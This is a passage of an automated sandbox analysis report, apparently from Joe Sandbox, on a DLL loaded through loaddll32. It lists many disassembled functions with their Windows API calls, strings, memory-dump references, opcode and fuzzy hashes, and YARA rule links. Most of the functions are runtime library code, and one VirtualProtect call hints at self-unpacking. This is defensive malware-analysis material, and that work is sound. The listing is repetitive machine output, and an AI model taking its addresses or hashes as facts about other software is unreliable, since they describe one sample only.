                          • Instruction Fuzzy Hash: C211047AE0052E9FCB01DBE0C854AEDB77BBF55715F104A08E510AB2D0EBB49A45C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D5FF, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                          • _free.LIBCMT ref: 6E24D636
                          • _free.LIBCMT ref: 6E24D65E
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D66B
                          • SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                          • _abort.LIBCMT ref: 6E24D67D
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: 12252f4bc2cc4df6d16230366899141a278cc82689004c76eb79c503cdacdbfd
                          • Instruction ID: 9a7cd09454368dbab1051a50c8191e7456ad7ac45acccf8267cc2d1e10e6fa86
                          • Opcode Fuzzy Hash: 12252f4bc2cc4df6d16230366899141a278cc82689004c76eb79c503cdacdbfd
                          • Instruction Fuzzy Hash: BBF0493904490DE7C78926F9EC0DF8A233F8BC2A66B244911F428D7184EFB488028874
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2075E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E2075F4
                            • Part of subcall function 6E2073A9: std::exception::exception.LIBCONCRT ref: 6E2073B6
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207602
                            • Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E207614
                            • Part of subcall function 6E2073E3: std::exception::exception.LIBCONCRT ref: 6E2073F0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207622
                          • std::regex_error::regex_error.LIBCPMT ref: 6E207634
                            • Part of subcall function 6E207426: std::exception::exception.LIBCONCRT ref: 6E20743E
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E207642
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
                          • String ID:
                          • API String ID: 2570946744-0
                          • Opcode ID: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction ID: bc20243a92160734bc8aa5ec56accde5d901f2cb113101ed41dab999bf1482eb
                          • Opcode Fuzzy Hash: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
                          • Instruction Fuzzy Hash: 44F0FE39C0010D7BCB05FBE4DC49CDDB77EAA14544F804A20AA1496591EB71A659C6D2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2053EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Getcvt$H_prolog3_catch_
                          • String ID: false$true
                          • API String ID: 1810345438-2658103896
                          • Opcode ID: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction ID: 7531bd0d55aa755e4efd8bfd98f7d9ad7d5b170f848d142ec67f51e9ce84f4e5
                          • Opcode Fuzzy Hash: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
                          • Instruction Fuzzy Hash: E7216DB6D0121CAFDB11CFE5C884ADEBBB9BF05710F04446AE9049F640EB709A95CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E24972F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E249742
                          • FreeLibrary.KERNEL32(00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E249765
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction ID: 11d5c449a251d1c9f717f503511100945b597d2cf1bf1fc52f41c0e5bb53406a
                          • Opcode Fuzzy Hash: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
                          • Instruction Fuzzy Hash: B1F0AF7090052EFBDF419F90C958FAEBFBAEF05712F0081A8A905A6240DB319A40CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
                          • Instruction ID: 52c41d5498e631e222ba9415a4411c17bf8912b07e00d30bfb53408d903723fb
                          • Opcode Fuzzy Hash: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
                          • Instruction Fuzzy Hash: 7471D23195031F9BDB518BD9CA44AAFBB76EF49311F144629E82167380C7B18866CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24A737, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
                          • Instruction ID: 3f7f4bc7bcf24339a14b48fcccea091df010d716c30d5fa0513ad6727c82625c
                          • Opcode Fuzzy Hash: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
                          • Instruction Fuzzy Hash: 9541A276E40208DFDB14CFA8C885A9EB7F6EF89714B254569D915EB241E731E902CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D683, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(6E2075D9,6E2075D9,00000002,6E242286,6E24F2B0,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004), ref: 6E24D688
                          • _free.LIBCMT ref: 6E24D6BD
                          • _free.LIBCMT ref: 6E24D6E4
                          • SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6F1
                          • SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 614b117d0bd6845f7f2d5800514683df6bf4c0565f122ed309d2bea76e8e9b59
                          • Instruction ID: 9d6dd68942a56b49741f1a5482711501c10d2b951223f683445f59e11dc200fb
                          • Opcode Fuzzy Hash: 614b117d0bd6845f7f2d5800514683df6bf4c0565f122ed309d2bea76e8e9b59
                          • Instruction Fuzzy Hash: C001FE7A18490AEBD34916F9EC4DE5B273F9BC37767244525F41D96240EFF488018974
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25CCC3, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 6E25CCDB
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25CCED
                          • _free.LIBCMT ref: 6E25CCFF
                          • _free.LIBCMT ref: 6E25CD11
                          • _free.LIBCMT ref: 6E25CD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
                          • Instruction ID: e23053e84b8e6bb67568be27089eec695c5d5f401943e04cc8de466a4227d7f5
                          • Opcode Fuzzy Hash: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
                          • Instruction Fuzzy Hash: 50F04435441A0ED7CA94CBD8E5CAC5B37EFBA09E117704C05E065EF601E774F8948AE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E247D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea
                          • String ID: a/p$am/pm
                          • API String ID: 240046367-3206640213
                          • Opcode ID: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
                          • Instruction ID: 62c3d0ebb481481a39a7dda47ff20ff33918b03a5916278e0e20b5e2f99a19c4
                          • Opcode Fuzzy Hash: 1135db9fb08671d6d60d0ed20f61cfa544f943afaf15cefb0e846a7834a4449f
                          • Instruction Fuzzy Hash: DFD1D37593424FDBDB4D8FE8C850BAAB7B2FF06301F14455AE928AB284E3759940CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1FF218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 217memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(6E2C86A0,0000305A,00000040,6E2C869C,?,00000000,1EB1FCD4,008B0D95,?), ref: 6E1FF2D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: DZ,n$DZ,n$E
                          • API String ID: 544645111-3168969833
                          • Opcode ID: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction ID: 331258f8ce98d70d3860fa178d7b431092c3152db7a2a0804e97dc074c997fe7
                          • Opcode Fuzzy Hash: 7b69f7bbc56599ba95007a87458e53b184574e811696793878eaa64c24477857
                          • Instruction Fuzzy Hash: ED811271A415618FCF88CFAAC88D6797BF6BB5AB10B20815BE441D7380E378E541DBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3_catch_wcslen
                          • String ID: For$`k,n
                          • API String ID: 1260878687-1763375410
                          • Opcode ID: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction ID: 67532f0e83a35c3b0ebb2299c210994367130e8a5225051f6bfa046bdc138d45
                          • Opcode Fuzzy Hash: 388df7aa412f50ede240fee3d40f7d71c0cf55d3a2a2837a6dea8f03a4796fad
                          • Instruction Fuzzy Hash: A6419C79A2021E8FCB40DBE8C5D49ACB7B3BF9AB14B208245E551BB3D1C670E842C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 6E258B1F
                          • _free.LIBCMT ref: 6E258B75
                            • Part of subcall function 6E258951: _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E258951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                            • Part of subcall function 6E258951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n
                          • API String ID: 314583886-2553279824
                          • Opcode ID: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
                          • Instruction ID: 2d7148b183a6b827f0dbd635795aa4ac155bef34ca229043efccfa8fcf4cf7c1
                          • Opcode Fuzzy Hash: 0b56662eb3f08cfb7a96f3ed6336703de2b06adc9c70305fabc973a387e0a5ee
                          • Instruction Fuzzy Hash: DF217CB6C1421D9BDB2887A8CE44DDBB37FCB81720F1006A5D455E6340DBB04D90C5A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction ID: 6898c8c95af63bb64c1bd810da426ff31557d66aa9f6f58dc9a9725a31fc5930
                          • Opcode Fuzzy Hash: 49bfbd02ac0c7b664a1dae2fe1523bbc64c5067317e86750fd35a371e3dbabac
                          • Instruction Fuzzy Hash: 02F0F4B2E446192FDF54DBD8C802FDA73A96B14314F208845F951AB582EB75A889C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strlen$H_prolog3
                          • String ID: [json.exception.
                          • API String ID: 2883720156-791563284
                          • Opcode ID: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction ID: ed24d3b07345910740ac1649ea3544e7153a155586584edc6b9706bbbf42f53f
                          • Opcode Fuzzy Hash: 6482fbad8b00c91d55268247e91ae520689531c08aaf8be9be6c08693ad865bf
                          • Instruction Fuzzy Hash: 64F036B5600219AFDB189FB8C8506FEB6EFBF44708F540919E409DB281DBB45D548791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction ID: 07e65a92fcb1d6d644c436182b844975bdb8764f7259a11deebbd27491fcd912
                          • Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
                          • Instruction Fuzzy Hash: 3EA1557691428FDFF719CFA8C890BABBBE6EF85314F2442ADD5949B280C7348941CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E256102, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E270EA8,00000000,00000000,008B018B,6E24DA1E,?,00000004,00000001,6E270EA8,0000007F,?,008B018B,00000001), ref: 6E25614F
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2561D8
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2561EA
                          • __freea.LIBCMT ref: 6E2561F3
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
                          • Instruction ID: 24040bab084808e666568400936d7155eeaf8ac9e81db9348fa2041b39c9d7f1
                          • Opcode Fuzzy Hash: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
                          • Instruction Fuzzy Hash: 6B31BF71A1021F9FDF148FA4CC84DBE7BA6EB40614F188568EC14DA351EB35C960CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E253E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue), ref: 6E253EB1
                          • GetLastError.KERNEL32(?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000,00000364,?,6E24D6D1), ref: 6E253EBD
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000), ref: 6E253ECB
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
